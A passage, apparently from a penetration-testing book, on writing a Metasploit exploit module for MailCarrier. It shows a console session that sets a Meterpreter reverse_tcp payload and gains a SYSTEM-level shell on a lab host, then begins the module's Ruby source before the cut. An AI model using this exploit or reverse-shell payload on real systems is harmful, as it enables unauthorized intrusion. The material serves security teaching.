Chapter 15

Figure 15-3: Randomized MailCarrier buffer

The payload.encoded function tells Metasploit to append the indicated payload to the end of the malicious string at run time.

Now, when we load our module, set a real payload, and execute it, we should be presented with our hard-earned shell, as shown here:

msf exploit(mailcarrier_book) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mailcarrier_book) > exploit

[*] Started reverse handler on 192.168.1.101:4444
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.155:1265)

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Our Completed Module

Just to wrap things up, here is the complete and final code for this Metasploit 
exploit module:

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
       Rank = GoodRanking
       
       include Msf::Exploit::Remote::Tcp